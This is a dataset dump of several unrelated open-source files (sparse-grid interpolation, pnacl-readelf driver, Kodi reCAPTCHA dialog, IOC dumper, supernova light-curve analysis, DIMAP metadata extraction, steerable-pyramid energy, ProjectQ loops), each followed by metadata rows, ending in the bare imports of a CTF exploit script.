For a copy of the GNU General Public License, please see
<http://www.gnu.org/licenses/>.
'''
class RandomDimension(object):
'''Random dimension object that encapsulates the operations along one of the
dimensions in random space, which corresponds to one of the random variables
'''
kmax = 0
nodes = None
def __init__(self, bound):
self._bound = bound
@classmethod
def set_maximum_interp_level(cls, value):
cls.kmax = value
cls._init_nodes()
@classmethod
def _init_nodes(cls):
'''Initialize nodes in a hierarchical fashion as a list of sublists,
where each sublist contains the nodes added at the corresponding level
'''
cls.nodes = []
if cls.kmax > 0:
cls.nodes.append([0.5])
if cls.kmax > 1:
cls.nodes.append([0.0, 1.0])
if cls.kmax > 2:
for k in xrange(3, cls.kmax+1):
cls.nodes.append([
(1.0 + 2.0*j)/(2**(k-1)) for j in xrange(2**(k-2))])
def get_node(self, level, idx, normalized = False):
'''Return the scaled coordinates of a node at the given level and index
'''
if normalized:
return self.nodes[level-1][idx]
else:
lo = self._bound[0]
hi = self._bound[1]
return lo + (hi-lo)*self.nodes[level-1][idx]
@classmethod
def _interpolate(cls, pt1, x2):
'''Evaluate basis function centered at pt1, at x2. pt1 has to be a
tuple of the form (level, index) that specifies the interpolation level
and the index of the node at that level. x2 is any float value between
0 and 1, specifying the location where the basis function is to be
evaluated.
'''
level1, idx1 = pt1
x1 = cls.nodes[level1-1][idx1]
if level1 == 1:
return 1.0
else:
m = 2**(level1-1) + 1 # Number of nodes at this level
return (abs(x1-x2) < 1./(m-1)) * (1. - (m-1)*abs(x1-x2))
def interpolate(self, pt1, x):
'''Evaluate basis function centered at pt1, at the location x. This
method scales x to be in [0,1] and calls _interpolate to get the actual
interpolated value
'''
lo = self._bound[0]
hi = self._bound[1]
if lo <= x <= hi:
return self._interpolate(pt1, float(x-lo)/float(hi-lo))
else:
return 0.
def get_basis_function(self, pt):
'''Return bounds of the piece-wise linear basis function centered at pt.
'''
lo = self._bound[0]
hi = self._bound[1]
level, idx = pt
if level == 1:
return (lo, hi, pt)
elif level == 2:
lo = (lo + hi)/2 if idx == 1 else lo
hi = (lo + hi)/2 if idx == 0 else hi
return (lo, hi, pt)
else:
m = 2**(level-1) + 1 # Number of nodes at this level
x = lo + (hi-lo)*self.nodes[level-1][idx]
return (x-(hi-lo)/(m-1), x+(hi-lo)/(m-1), pt)
|
gpl-3.0
| -7,993,344,271,732,080,000
| 31.973451
| 80
| 0.580247
| false
| 3.763636
| false
| false
| false
|
endlessm/chromium-browser
|
native_client/pnacl/driver/pnacl-readelf.py
|
2
|
3751
|
#!/usr/bin/python
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from driver_env import env
from driver_log import Log
import driver_tools
import filetype
EXTRA_ENV = {
'INPUTS': '',
'FLAGS': '',
}
PATTERNS = [
( '(-.*)', "env.append('FLAGS', $0)"),
( '(.*)', "env.append('INPUTS', pathtools.normalize($0))"),
]
def main(argv):
env.update(EXTRA_ENV)
driver_tools.ParseArgs(argv, PATTERNS)
inputs = env.get('INPUTS')
if len(inputs) == 0:
Log.Fatal("No input files given")
for infile in inputs:
driver_tools.CheckPathLength(infile)
env.push()
env.set('input', infile)
if filetype.IsLLVMBitcode(infile):
# Hack to support newlib build.
# Newlib determines whether the toolchain supports .init_array, etc., by
# compiling a small test and looking for a specific section tidbit using
# "readelf -S". Since pnacl compiles to bitcode, readelf isn't available.
# (there is a line: "if ${READELF} -S conftest | grep -e INIT_ARRAY"
# in newlib's configure file).
# TODO(sehr): we may want to implement a whole readelf on bitcode.
flags = env.get('FLAGS')
if len(flags) == 1 and flags[0] == '-S':
print('INIT_ARRAY')
return 0
Log.Fatal('Cannot handle pnacl-readelf %s' % str(argv))
return 1
driver_tools.Run('"${READELF}" ${FLAGS} ${input}')
env.pop()
# only reached in case of no errors
return 0
def get_help(unused_argv):
return """
Usage: %s <option(s)> elf-file(s)
Display information about the contents of ELF format files
Options are:
-a --all Equivalent to: -h -l -S -s -r -d -V -A -I
-h --file-header Display the ELF file header
-l --program-headers Display the program headers
--segments An alias for --program-headers
-S --section-headers Display the sections' header
--sections An alias for --section-headers
-g --section-groups Display the section groups
-t --section-details Display the section details
-e --headers Equivalent to: -h -l -S
-s --syms Display the symbol table
--symbols An alias for --syms
-n --notes Display the core notes (if present)
-r --relocs Display the relocations (if present)
-u --unwind Display the unwind info (if present)
-d --dynamic Display the dynamic section (if present)
-V --version-info Display the version sections (if present)
-A --arch-specific Display architecture specific information (if any).
-c --archive-index Display the symbol/file index in an archive
-D --use-dynamic Use the dynamic section info when displaying symbols
-x --hex-dump=<number|name>
Dump the contents of section <number|name> as bytes
-p --string-dump=<number|name>
Dump the contents of section <number|name> as strings
-R --relocated-dump=<number|name>
Dump the contents of section <number|name> as relocated bytes
-w[lLiaprmfFsoR] or
--debug-dump[=rawline,=decodedline,=info,=abbrev,=pubnames,=aranges,=macro,=frames,=str,=loc,=Ranges]
Display the contents of DWARF2 debug sections
-I --histogram Display histogram of bucket list lengths
-W --wide Allow output width to exceed 80 characters
@<file> Read options from <file>
-H --help Display this information
-v --version Display the version number of readelf
""" % env.getone('SCRIPT_NAME')
|
bsd-3-clause
| 4,530,193,218,533,686,300
| 39.333333
| 103
| 0.628099
| false
| 3.710188
| false
| false
| false
|
kreatorkodi/repository.torrentbr
|
script.module.urlresolver/lib/urlresolver/plugins/lib/recaptcha_v2.py
|
1
|
7299
|
# -*- coding: utf-8 -*-
"""
urlresolver XBMC Addon
Copyright (C) 2016 tknorris
Derived from Shani's LPro Code (https://github.com/Shani-08/ShaniXBMCWork2/blob/master/plugin.video.live.streamspro/unCaptcha.py)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
reusable captcha methods
"""
import re
import os
import xbmcgui
from urlresolver import common
class cInputWindow(xbmcgui.WindowDialog):
def __init__(self, *args, **kwargs):
bg_image = os.path.join(common.addon_path, 'resources', 'images', 'DialogBack2.png')
check_image = os.path.join(common.addon_path, 'resources', 'images', 'checked.png')
button_fo = os.path.join(common.kodi.get_path(), 'resources', 'skins', 'Default', 'media', 'button-fo.png')
button_nofo = os.path.join(common.kodi.get_path(), 'resources', 'skins', 'Default', 'media', 'button-nofo.png')
self.cancelled = False
self.chk = [0] * 9
self.chkbutton = [0] * 9
self.chkstate = [False] * 9
imgX, imgY, imgw, imgh = 436, 210, 408, 300
ph, pw = imgh / 3, imgw / 3
x_gap = 70
y_gap = 70
button_gap = 40
button_h = 40
button_y = imgY + imgh + button_gap
middle = imgX + (imgw / 2)
win_x = imgX - x_gap
win_y = imgY - y_gap
win_h = imgh + 2 * y_gap + button_h + button_gap
win_w = imgw + 2 * x_gap
ctrlBackgound = xbmcgui.ControlImage(win_x, win_y, win_w, win_h, bg_image)
self.addControl(ctrlBackgound)
self.msg = '[COLOR red]%s[/COLOR]' % (kwargs.get('msg'))
self.strActionInfo = xbmcgui.ControlLabel(imgX, imgY - 30, imgw, 20, self.msg, 'font13')
self.addControl(self.strActionInfo)
img = xbmcgui.ControlImage(imgX, imgY, imgw, imgh, kwargs.get('captcha'))
self.addControl(img)
self.iteration = kwargs.get('iteration')
self.strActionInfo = xbmcgui.ControlLabel(imgX, imgY + imgh, imgw, 20, common.i18n('captcha_round') % (str(self.iteration)), 'font40')
self.addControl(self.strActionInfo)
self.cancelbutton = xbmcgui.ControlButton(middle - 110, button_y, 100, button_h, common.i18n('cancel'), focusTexture=button_fo, noFocusTexture=button_nofo, alignment=2)
self.okbutton = xbmcgui.ControlButton(middle + 10, button_y, 100, button_h, common.i18n('ok'), focusTexture=button_fo, noFocusTexture=button_nofo, alignment=2)
self.addControl(self.okbutton)
self.addControl(self.cancelbutton)
for i in xrange(9):
row = i / 3
col = i % 3
x_pos = imgX + (pw * col)
y_pos = imgY + (ph * row)
self.chk[i] = xbmcgui.ControlImage(x_pos, y_pos, pw, ph, check_image)
self.addControl(self.chk[i])
self.chk[i].setVisible(False)
self.chkbutton[i] = xbmcgui.ControlButton(x_pos, y_pos, pw, ph, str(i + 1), font='font1', focusTexture=button_fo, noFocusTexture=button_nofo)
self.addControl(self.chkbutton[i])
for i in xrange(9):
row_start = (i / 3) * 3
right = row_start + (i + 1) % 3
left = row_start + (i - 1) % 3
up = (i - 3) % 9
down = (i + 3) % 9
self.chkbutton[i].controlRight(self.chkbutton[right])
self.chkbutton[i].controlLeft(self.chkbutton[left])
if i <= 2:
self.chkbutton[i].controlUp(self.okbutton)
else:
self.chkbutton[i].controlUp(self.chkbutton[up])
if i >= 6:
self.chkbutton[i].controlDown(self.okbutton)
else:
self.chkbutton[i].controlDown(self.chkbutton[down])
self.okbutton.controlLeft(self.cancelbutton)
self.okbutton.controlRight(self.cancelbutton)
self.cancelbutton.controlLeft(self.okbutton)
self.cancelbutton.controlRight(self.okbutton)
self.okbutton.controlDown(self.chkbutton[2])
self.okbutton.controlUp(self.chkbutton[8])
self.cancelbutton.controlDown(self.chkbutton[0])
self.cancelbutton.controlUp(self.chkbutton[6])
self.setFocus(self.okbutton)
def get(self):
self.doModal()
self.close()
if not self.cancelled:
return [i for i in xrange(9) if self.chkstate[i]]
def onControl(self, control):
if control == self.okbutton and any(self.chkstate):
self.close()
elif control == self.cancelbutton:
self.cancelled = True
self.close()
else:
label = control.getLabel()
if label.isnumeric():
index = int(label) - 1
self.chkstate[index] = not self.chkstate[index]
self.chk[index].setVisible(self.chkstate[index])
def onAction(self, action):
if action == 10:
self.cancelled = True
self.close()
class UnCaptchaReCaptcha:
net = common.Net()
def processCaptcha(self, key, lang):
headers = {'Referer': 'https://www.google.com/recaptcha/api2/demo', 'Accept-Language': lang}
html = self.net.http_GET('http://www.google.com/recaptcha/api/fallback?k=%s' % (key), headers=headers).content
token = ''
iteration = 0
while True:
payload = re.findall('"(/recaptcha/api2/payload[^"]+)', html)
iteration += 1
message = re.findall('<label[^>]+class="fbc-imageselect-message-text"[^>]*>(.*?)</label>', html)
if not message:
message = re.findall('<div[^>]+class="fbc-imageselect-message-error">(.*?)</div>', html)
if not message:
token = re.findall('"this\.select\(\)">(.*?)</textarea>', html)[0]
if token:
common.log_utils.log_debug('Captcha Success: %s' % (token))
else:
common.log_utils.log_debug('Captcha Failed: %s')
break
else:
message = message[0]
payload = payload[0]
cval = re.findall('name="c"\s+value="([^"]+)', html)[0]
captcha_imgurl = 'https://www.google.com%s' % (payload.replace('&', '&'))
message = re.sub('</?strong>', '', message)
oSolver = cInputWindow(captcha=captcha_imgurl, msg=message, iteration=iteration)
captcha_response = oSolver.get()
if not captcha_response:
break
data = {'c': cval, 'response': captcha_response}
html = self.net.http_POST("http://www.google.com/recaptcha/api/fallback?k=%s" % (key), form_data=data, headers=headers).content
return token
|
gpl-2.0
| -6,874,958,783,085,708,000
| 42.96988
| 176
| 0.590218
| false
| 3.574437
| false
| false
| false
|
mandiant/ioc_writer
|
ioc_writer/scripts/iocdump.py
|
1
|
2104
|
# iocdump.py
#
# Copyright 2016 FireEye
# Licensed under the Apache 2.0 license. Developed for Mandiant by William
# Gibb.
#
# Mandiant licenses this file to you under the Apache License, Version
# 2.0 (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# Allows for the upgrade of OpenIOC 1.0 IOCs to OpenIOC 1.1 format
#
# Stdlib
from __future__ import print_function
import argparse
import logging
import os
import sys
# Third Party code
# Custom Code
from ..managers import IOCManager
log = logging.getLogger(__name__)
def main(options):
if not options.verbose:
logging.disable(logging.DEBUG)
iocm = IOCManager()
for i in options.input:
iocm.insert(i)
for ioc_obj in iocm.iocs.values():
if options.hide_params:
ioc_obj.display_params = False
print(ioc_obj)
def makeargpaser():
parser = argparse.ArgumentParser(description="Display a textual representation of an IOC or directory of IOCs")
parser.add_argument('input', type=str, nargs='+',
help='Input files or folders')
parser.add_argument('-n', '--no-params', dest='hide_params', default=False, action='store_true',
help='Do not display parameters attached to an IOC.')
parser.add_argument('-v', '--verbose', dest='verbose', default=False, action='store_true',
help='Enable verbose output')
return parser
def _main():
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s [%(filename)s:%(funcName)s]')
p = makeargpaser()
opts = p.parse_args()
main(opts)
if __name__ == '__main__':
_main()
|
apache-2.0
| -8,542,234,613,581,370,000
| 32.951613
| 120
| 0.678232
| false
| 3.710758
| false
| false
| false
|
tayebzaidi/snova_analysis
|
Miscellaneous/typ1a_features.py
|
1
|
2252
|
import matplotlib.pyplot as plt
import scipy.interpolate as scinterp
import numpy as np
import peakfinding
import peak_original
import smoothing
import plotter
import random
import readin
import sys
import os
if __name__== '__main__':
Mbdata = []
delM15data = []
path = "/Users/zaidi/Documents/REU/restframe/"
filenames = os.listdir(path)
random.shuffle(filenames)
for filename in filenames:
current_file = os.path.join(path, filename)
data= readin.readin_SNrest(filename)
indB = np.where((data.band == 'B'))
Bdata = data[indB]
Bdata = np.sort(Bdata)
if len(Bdata.phase) > 3:
spl = scinterp.UnivariateSpline(Bdata.phase, Bdata.mag)
spl.set_smoothing_factor(2./len(Bdata.phase))
phase_new = np.arange(Bdata.phase[0], Bdata.phase[-1], 1)
mag_new = spl(phase_new)
maxp, minp = peak_original.peakdet(mag_new, 0.5, phase_new)
if len(minp) > 0 and minp[0][0] < 5 and minp[0][0] > -5:
Mb = minp[0][1]
delM15 = minp[0][1] - spl(minp[0][0]+15)
Mbdata.append(Mb)
delM15data.append(delM15)
if delM15 > 0 or delM15 < -5:
print minp
print filename
print spl(minp[0][0] + 15)
fig = plt.figure(1)
ax = fig.add_subplot(1,1,1)
ax.plot(phase_new, mag_new)
ax.plot(Bdata.phase, Bdata.mag)
if len(minp) > 0:
ax.scatter(minp[:,0],minp[:,1])
plt.show(fig)
'''
maxp, minp = peakfinding.peakdetect(mag_new, phase_new, 200, 1.5)
if len(minp) > 0:
print minp
print filename
fig = plt.figure(1)
ax = fig.add_subplot(1,1,1)
#ax.scatter(minp[:,0], minp[:,1],'bo')
#ax.plot(Bdata.phase, Bdata.mag)
#plt.show(fig)
'''
#interp = smoothing.Interpolate1D(data.phase
print Mbdata
print delM15data
fig = plt.figure(2)
ax = fig.add_subplot(1,1,1)
ax.scatter(Mbdata, delM15data)
plt.show(fig)
|
gpl-3.0
| -7,822,784,365,329,970,000
| 33.121212
| 73
| 0.521314
| false
| 3.292398
| false
| false
| false
|
DREAM-ODA-OS/tools
|
metadata/dimap2eop.py
|
1
|
3474
|
#!/usr/bin/env python
#------------------------------------------------------------------------------
#
# Extract O&M-EOP metadata document.
#
# Project: EO Metadata Handling
# Authors: Martin Paces <martin.paces@eox.at>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2013 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
import traceback
import sys
import os.path
from lxml import etree as et
from profiles.interfaces import ProfileDimap
from profiles.spot6_ortho import ProfileSpot6Ortho
from profiles.spot_view import ProfileSpotView
from profiles.spot_scene_1a import ProfileSpotScene1a
from profiles.pleiades1_ortho import ProfilePleiades1Ortho
XML_OPTS = {'pretty_print': True, 'xml_declaration': True, 'encoding': 'utf-8'}
PROFILES = (
ProfileSpotScene1a, ProfileSpotView,
ProfileSpot6Ortho, ProfilePleiades1Ortho,
)
def main(fname):
xml = et.parse(fname, et.XMLParser(remove_blank_text=True))
profile = get_profile(xml)
print et.tostring(profile.extract_eop_metadata(xml, file_name=fname), **XML_OPTS)
def get_profile(xml):
for item in PROFILES:
if item.check_profile(xml):
return item
prf = ProfileDimap.get_dimap_profile(xml)
if prf is None:
raise ValueError("Not a DIMAP XML document!")
profile, version = prf
raise ValueError("Unsupported DIMAP version %s profile '%s'!"%(version, profile))
#------------------------------------------------------------------------------
if __name__ == "__main__":
EXENAME = os.path.basename(sys.argv[0])
DEBUG = False
try:
XML = sys.argv[1]
for arg in sys.argv[2:]:
if arg == "DEBUG":
DEBUG = True # dump debuging output
except IndexError:
print >>sys.stderr, "ERROR: %s: Not enough input arguments!"%EXENAME
print >>sys.stderr
print >>sys.stderr, "Extract EOP XML metadata from DIMAP XML metadata."
print >>sys.stderr
print >>sys.stderr, "USAGE: %s <input-xml> [DEBUG]"%EXENAME
sys.exit(1)
if DEBUG:
print >>sys.stderr, "input-xml: ", XML
try:
main(XML)
except Exception as exc:
print >>sys.stderr, "ERROR: %s: %s "%(EXENAME, exc)
if DEBUG:
print >>sys.stderr, traceback.format_exc()
sys.exit(1)
|
mit
| -2,620,814,347,079,095,300
| 36.354839
| 85
| 0.632988
| false
| 4.00692
| false
| false
| false
|
billbrod/spatial-frequency-preferences
|
sfp/image_computable.py
|
1
|
6815
|
#!/usr/bin/python
"""code to help run the image-computable version of the model
we're using this primarily to check the effect of vignetting, but this does make our project
image-computable (though it's a linear model and so will fail in some trivial cases)
"""
import itertools
import argparse
import numpy as np
import pandas as pd
import pyrtools as pt
from scipy import interpolate
def upsample(signal, target_shape):
"""upsample a signal to target_shape
this uses scipy's interpolate.interp2d (and so will end up with a smoothed signal)
"""
x = np.linspace(-(signal.shape[0]-1)/2, (signal.shape[0]-1)/2, num=signal.shape[0])
y = np.linspace(-(signal.shape[1]-1)/2, (signal.shape[1]-1)/2, num=signal.shape[1])
f = interpolate.interp2d(x, y, signal)
x = np.linspace(-(signal.shape[0]-1)/2, (signal.shape[0]-1)/2, num=target_shape[0])
y = np.linspace(-(signal.shape[1]-1)/2, (signal.shape[1]-1)/2, num=target_shape[1])
return f(x,y)
def calc_energy_and_filters(stim, stim_df, n_orientations=6, save_path_template=None):
"""this creates the energy and filter arrays
We assume the stimuli have natural groups, here indexed by the "class_idx" column in stim_df,
and all stimuli within these groups should be considered the same stimuli, that is, we sum the
energy across all of them. for the spatial frequency project, these are the different phases of
the gratings (because of how we structure our experiment, we estimate a response amplitude to
all phases together).
Note that this will take a while to run (~10 or 20 minutes). Since it only needs to run once
per experiment, didn't bother to make it efficient at all. The outputs will also be very large,
totalling about 11GB
Parameters
----------
stim : np.ndarray
The stimuli to produce energy for. Should have shape (n, *img_size), where n is the number
of total stimuli.
stim_df : pd.DataFrame
The DataFrame describing the stimuli. Must contain the column "class_idx", which indexes
the different stimulus classes (see above)
n_orientations : int
the number of orientations in the steerable pyramid. 6 is the number used to model fMRI
voxels in Roth, Z. N., Heeger, D., & Merriam, E. (2018). Stimulus vignetting and
orientation selectivity in human visual cortex. bioRxiv.
save_path_template : str or None
the template string for the save path we'll use for energy and filters. should end in .npy
and contain one %s, which we'll replace with "energy" and "filters".
Returns
-------
energy : np.ndarray
energy has shape (stim_df.class_idx.nunique(), max_ht, n_orientations, *img_size) and
contains the energy (square and absolute value the complex valued output of
SteerablePyramidFreq; equivalently, square and sum the output of the quadrature pair of
filters that make up the pyramid) for each image, at each scale and orientation. the energy
has all been upsampled to the size of the initial image.
filters : np.ndarray
filters has shape (max_ht, n_orientations, *img_size) and is the fourier transform of the
filters at each scale and orientation, zero-padded so they all have the same size. we only
have one set of filters (instead of one per stimulus class) because the same pyramid was
used for each of them; we ensure this by getting the filters for each stimulus class and
checking that they're individually equal to the average across classes.
"""
img_size = stim.shape[1:]
# this computation comes from the SteerablePyramidFreq code
max_ht = int(np.floor(np.log2(min(img_size))) - 2)
energy = np.zeros((stim_df.class_idx.nunique(), max_ht, n_orientations, *img_size),
dtype=np.float32)
filters = np.zeros_like(energy)
for i, g in stim_df.groupby('class_idx'):
idx = g.index
filled_filters = False
for j in idx:
pyr = pt.pyramids.SteerablePyramidFreq(stim[j], order=n_orientations-1, is_complex=True)
for k, l in itertools.product(range(max_ht), range(n_orientations)):
energy[int(i), k, l, :, :] += upsample(np.abs(pyr.pyr_coeffs[(k, l)])**2, img_size)
# we only want to run this once per stimulus class
if not filled_filters:
if k > 0:
lomask = pyr._lomasks[k-1]
else:
lomask = pyr._lo0mask
filt = pyr._anglemasks[k][l] * pyr._himasks[k] * lomask
pad_num = []
for m in range(2):
pad_num.append([(img_size[m] - filt.shape[m])//2, (img_size[m] - filt.shape[m])//2])
if filt.shape[m] + 2*pad_num[m][0] != img_size[m]:
pad_num[m][0] += img_size[m] - (filt.shape[m] + 2*pad_num[m][0])
filters[int(i), k, l, :, :] = np.pad(filt, pad_num, 'constant', constant_values=0)
filled_filters = True
filter_mean = np.mean(filters, 0)
for i in range(filters.shape[0]):
if not(np.allclose(filter_mean, filters[i,:,:,:,:])):
raise Exception("Something has gone terribly wrong, the filters for stim class %d are different than the rest!" % i)
filters = filter_mean
if save_path_template is not None:
np.save(save_path_template % "energy", energy)
np.save(save_path_template % "filters", filters)
return energy, filters
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=("Calculate and save the energy for each stimulus class, as well as the Fourier"
" transform of the filters of the steerable pyramid we use to get this. For "
"use with image-computable version of this model"),
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("stimuli",
help=("Path to the stimulus .npy file."))
parser.add_argument("stimuli_description_df",
help=("Path to the stimulus description dataframe .csv file."))
parser.add_argument("save_path_template",
help=("Path template (with .npy extension) where we'll save the results. "
"Should contain one %s."))
parser.add_argument('--n_orientations', '-n', default=6, type=int,
help=("The number of orientations in the steerable pyramid used here."))
args = vars(parser.parse_args())
stim = np.load(args.pop('stimuli'))
stim_df = pd.read_csv(args.pop('stimuli_description_df'))
calc_energy_and_filters(stim, stim_df, **args)
|
mit
| 7,969,133,745,800,178,000
| 51.423077
| 128
| 0.634776
| false
| 3.784009
| false
| false
| false
|
ProjectQ-Framework/ProjectQ
|
projectq/meta/_loop.py
|
1
|
9774
|
# -*- coding: utf-8 -*-
# Copyright 2017 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tools to implement loops.
Example:
.. code-block:: python
with Loop(eng, 4):
H | qb
Rz(M_PI/3.) | qb
"""
from copy import deepcopy
from projectq.cengines import BasicEngine
from projectq.ops import Allocate, Deallocate
from ._util import insert_engine, drop_engine_after
class QubitManagementError(Exception):
"""Exception raised when the lifetime of a qubit is problematic within a loop"""
class LoopTag:
"""
Loop meta tag
"""
def __init__(self, num):
self.num = num
self.id = LoopTag.loop_tag_id
LoopTag.loop_tag_id += 1
def __eq__(self, other):
return isinstance(other, LoopTag) and self.id == other.id and self.num == other.num
def __ne__(self, other):
return not self.__eq__(other)
loop_tag_id = 0
class LoopEngine(BasicEngine):
"""
Stores all commands and, when done, executes them num times if no loop tag
handler engine is available.
If there is one, it adds a loop_tag to the commands and sends them on.
"""
def __init__(self, num):
"""
Initialize a LoopEngine.
Args:
num (int): Number of loop iterations.
"""
BasicEngine.__init__(self)
self._tag = LoopTag(num)
self._cmd_list = []
self._allocated_qubit_ids = set()
self._deallocated_qubit_ids = set()
# key: qubit id of a local qubit, i.e. a qubit which has been allocated
# and deallocated within the loop body.
# value: list contain reference to each weakref qubit with this qubit
# id either within control_qubits or qubits.
self._refs_to_local_qb = dict()
self._next_engines_support_loop_tag = False
def run(self):
"""
Apply the loop statements to all stored commands.
Unrolls the loop if LoopTag is not supported by any of the following
engines, i.e., if
.. code-block:: python
is_meta_tag_supported(next_engine, LoopTag) == False
"""
error_message = (
"\n Error. Qubits have been allocated in with "
"Loop(eng, num) context,\n which have not "
"explicitely been deallocated in the Loop context.\n"
"Correct usage:\nwith Loop(eng, 5):\n"
" qubit = eng.allocate_qubit()\n"
" ...\n"
" del qubit[0]\n"
)
if not self._next_engines_support_loop_tag: # pylint: disable=too-many-nested-blocks
# Unroll the loop
# Check that local qubits have been deallocated:
if self._deallocated_qubit_ids != self._allocated_qubit_ids:
raise QubitManagementError(error_message)
if len(self._allocated_qubit_ids) == 0:
# No local qubits, just send the circuit num times
for i in range(self._tag.num):
self.send(deepcopy(self._cmd_list))
else:
# Ancilla qubits have been allocated in loop body
# For each iteration, allocate and deallocate a new qubit and
# replace the qubit id in all commands using it.
for i in range(self._tag.num):
if i == 0: # Don't change local qubit ids
self.send(deepcopy(self._cmd_list))
else:
# Change local qubit ids before sending them
for refs_loc_qubit in self._refs_to_local_qb.values():
new_qb_id = self.main_engine.get_new_qubit_id()
for qubit_ref in refs_loc_qubit:
qubit_ref.id = new_qb_id
self.send(deepcopy(self._cmd_list))
else:
# Next engines support loop tag so no unrolling needed only
# check that all qubits have been deallocated which have been
# allocated in the loop body
if self._deallocated_qubit_ids != self._allocated_qubit_ids:
raise QubitManagementError(error_message)
def receive(self, command_list): # pylint: disable=too-many-branches
"""
Receive (and potentially temporarily store) all commands.
Add LoopTag to all receiving commands and send to the next engine if
a further engine is a LoopTag-handling engine. Otherwise store all
commands (to later unroll them). Check that within the loop body,
all allocated qubits have also been deallocated. If loop needs to be
unrolled and ancilla qubits have been allocated within the loop body,
then store a reference all these qubit ids (to change them when
unrolling the loop)
Args:
command_list (list<Command>): List of commands to store and later
unroll or, if there is a LoopTag-handling engine, add the
LoopTag.
"""
# pylint: disable=too-many-nested-blocks
if self._next_engines_support_loop_tag or self.next_engine.is_meta_tag_supported(LoopTag):
# Loop tag is supported, send everything with a LoopTag
# Don't check is_meta_tag_supported anymore
self._next_engines_support_loop_tag = True
if self._tag.num == 0:
return
for cmd in command_list:
if cmd.gate == Allocate:
self._allocated_qubit_ids.add(cmd.qubits[0][0].id)
elif cmd.gate == Deallocate:
self._deallocated_qubit_ids.add(cmd.qubits[0][0].id)
cmd.tags.append(self._tag)
self.send([cmd])
else:
# LoopTag is not supported, save the full loop body
self._cmd_list += command_list
# Check for all local qubits allocated and deallocated in loop body
for cmd in command_list:
if cmd.gate == Allocate:
self._allocated_qubit_ids.add(cmd.qubits[0][0].id)
# Save reference to this local qubit
self._refs_to_local_qb[cmd.qubits[0][0].id] = [cmd.qubits[0][0]]
elif cmd.gate == Deallocate:
self._deallocated_qubit_ids.add(cmd.qubits[0][0].id)
# Save reference to this local qubit
self._refs_to_local_qb[cmd.qubits[0][0].id].append(cmd.qubits[0][0])
else:
# Add a reference to each place a local qubit id is
# used as within either control_qubit or qubits
for control_qubit in cmd.control_qubits:
if control_qubit.id in self._allocated_qubit_ids:
self._refs_to_local_qb[control_qubit.id].append(control_qubit)
for qureg in cmd.qubits:
for qubit in qureg:
if qubit.id in self._allocated_qubit_ids:
self._refs_to_local_qb[qubit.id].append(qubit)
class Loop:
"""
Loop n times over an entire code block.
Example:
.. code-block:: python
with Loop(eng, 4):
# [quantum gates to be executed 4 times]
Warning:
If the code in the loop contains allocation of qubits, those qubits have to be deleted prior to exiting the
'with Loop()' context.
This code is **NOT VALID**:
.. code-block:: python
with Loop(eng, 4):
qb = eng.allocate_qubit()
H | qb # qb is still available!!!
The **correct way** of handling qubit (de-)allocation is as follows:
.. code-block:: python
with Loop(eng, 4):
qb = eng.allocate_qubit()
...
del qb # sends deallocate gate
"""
def __init__(self, engine, num):
"""
Enter a looped section.
Args:
engine: Engine handling the commands (usually MainEngine)
num (int): Number of loop iterations
Example:
.. code-block:: python
with Loop(eng, 4):
H | qb
Rz(M_PI/3.) | qb
Raises:
TypeError: If number of iterations (num) is not an integer
ValueError: If number of iterations (num) is not >= 0
"""
self.engine = engine
if not isinstance(num, int):
raise TypeError("Number of loop iterations must be an int.")
if num < 0:
raise ValueError("Number of loop iterations must be >=0.")
self.num = num
self._loop_eng = None
def __enter__(self):
if self.num != 1:
self._loop_eng = LoopEngine(self.num)
insert_engine(self.engine, self._loop_eng)
def __exit__(self, exc_type, exc_value, exc_traceback):
if self.num != 1:
# remove loop handler from engine list (i.e. skip it)
self._loop_eng.run()
self._loop_eng = None
drop_engine_after(self.engine)
|
apache-2.0
| -7,039,027,857,358,893,000
| 37.031128
| 115
| 0.562717
| false
| 4.138019
| false
| false
| false
|
shellphish/puppeteer
|
examples/ructf_2014_pwn200/doit.py
|
1
|
2635
|
import puppeteer as p
import logging
try:
import standard_logging # pylint: disable=W0611
except ImportError:
pass
